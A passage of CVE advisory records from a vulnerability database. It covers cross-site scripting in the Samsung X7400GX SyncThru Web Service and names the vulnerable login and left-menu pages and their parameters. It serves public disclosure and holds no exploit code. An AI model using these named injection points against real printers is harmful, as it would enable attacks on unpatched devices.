"ID": "CVE-2019-7421",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "XSS exists in SAMSUNG X7400GX SyncThru Web Service V6.A6.25 V11.01.05.25_08-21-2015 in \"/sws.login/gnb/loginView.sws\" in multiple parameters: contextpath and basedURL."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "http://packetstormsecurity.com/files/151584/SAMSUNG-X7400GX-Sync-Thru-Web-Cross-Site-Scripting.html",
"refsource": "MISC",
"url": "http://packetstormsecurity.com/files/151584/SAMSUNG-X7400GX-Sync-Thru-Web-Cross-Site-Scripting.html"
},
{
"name": "http://www.samsungprinter.com/",
"refsource": "MISC",
"url": "http://www.samsungprinter.com/"
},
{
"name": "http://www.samsung.com/Support/ProductSupport/download/index.aspx",
"refsource": "MISC",
"url": "http://www.samsung.com/Support/ProductSupport/download/index.aspx"
},
{
"name": "20190206 [CVE-2019-7418, CVE-2019-7419, CVE-2019-7420, CVE-2019-7421] Cross Site Scripting in SAMSUNG X7400GX Sync Thru Web Service",
"refsource": "FULLDISC",
"url": "http://seclists.org/fulldisclosure/2019/Feb/28"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2019-7421",
"datePublished": "2019-03-17T19:59:07",
"dateReserved": "2019-02-05T00:00:00",
"dateUpdated": "2024-08-04T20:46:46.213Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2019-7419 (GCVE-0-2019-7419)
Vulnerability from cvelistv5
Published
2019-03-17 19:53
Modified
2024-08-04 20:46
Severity ?
VLAI Severity ?
EPSS score ?
CWE
- n/a
Summary
XSS exists in SAMSUNG X7400GX SyncThru Web Service V6.A6.25 V11.01.05.25_08-21-2015 in "/sws/leftmenu.sws" in multiple parameters: ruiFw_id, ruiFw_pid, ruiFw_title.
References
| ▼ | URL | Tags |
|---|---|---|
| http://packetstormsecurity.com/files/151584/SAMSUNG-X7400GX-Sync-Thru-Web-Cross-Site-Scripting.html | x_refsource_MISC | |
| http://www.samsungprinter.com/ | x_refsource_MISC | |
| http://www.samsung.com/Support/ProductSupport/download/index.aspx | x_refsource_MISC | |
| http://seclists.org/fulldisclosure/2019/Feb/28 | mailing-list, x_refsource_FULLDISC |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-04T20:46:46.217Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://packetstormsecurity.com/files/151584/SAMSUNG-X7400GX-Sync-Thru-Web-Cross-Site-Scripting.html"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://www.samsungprinter.com/"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://www.samsung.com/Support/ProductSupport/download/index.aspx"
},
{
"name": "20190206 [CVE-2019-7418, CVE-2019-7419, CVE-2019-7420, CVE-2019-7421] Cross Site Scripting in SAMSUNG X7400GX Sync Thru Web Service",
"tags": [
"mailing-list",
"x_refsource_FULLDISC",
"x_transferred"
],
"url": "http://seclists.org/fulldisclosure/2019/Feb/28"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2019-02-06T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "XSS exists in SAMSUNG X7400GX SyncThru Web Service V6.A6.25 V11.01.05.25_08-21-2015 in \"/sws/leftmenu.sws\" in multiple parameters: ruiFw_id, ruiFw_pid, ruiFw_title."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2019-03-17T19:53:18",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "http://packetstormsecurity.com/files/151584/SAMSUNG-X7400GX-Sync-Thru-Web-Cross-Site-Scripting.html"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://www.samsungprinter.com/"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://www.samsung.com/Support/ProductSupport/download/index.aspx"
},
{
"name": "20190206 [CVE-2019-7418, CVE-2019-7419, CVE-2019-7420, CVE-2019-7421] Cross Site Scripting in SAMSUNG X7400GX Sync Thru Web Service",
"tags": [
"mailing-list",
"x_refsource_FULLDISC"
],
"url": "http://seclists.org/fulldisclosure/2019/Feb/28"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2019-7419",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "XSS exists in SAMSUNG X7400GX SyncThru Web Service V6.A6.25 V11.01.05.25_08-21-2015 in \"/sws/leftmenu.sws\" in multiple parameters: ruiFw_id, ruiFw_pid, ruiFw_title."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "http://packetstormsecurity.com/files/151584/SAMSUNG-X7400GX-Sync-Thru-Web-Cross-Site-Scripting.html",
"refsource": "MISC",
"url": "http://packetstormsecurity.com/files/151584/SAMSUNG-X7400GX-Sync-Thru-Web-Cross-Site-Scripting.html"
},
{
"name": "http://www.samsungprinter.com/",
"refsource": "MISC",
"url": "http://www.samsungprinter.com/"
},
{
"name": "http://www.samsung.com/Support/ProductSupport/download/index.aspx",
"refsource": "MISC",
"url": "http://www.samsung.com/Support/ProductSupport/download/index.aspx"
},
{
"name": "20190206 [CVE-2019-7418, CVE-2019-7419, CVE-2019-7420, CVE-2019-7421] Cross Site Scripting in SAMSUNG X7400GX Sync Thru Web Service",
"refsource": "FULLDISC",
"url": "http://seclists.org/fulldisclosure/2019/Feb/28"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2019-7419",
"datePublished": "2019-03-17T19:53:18",
"dateReserved": "2019-02-05T00:00:00",
"dateUpdated": "2024-08-04T20:46:46.217Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}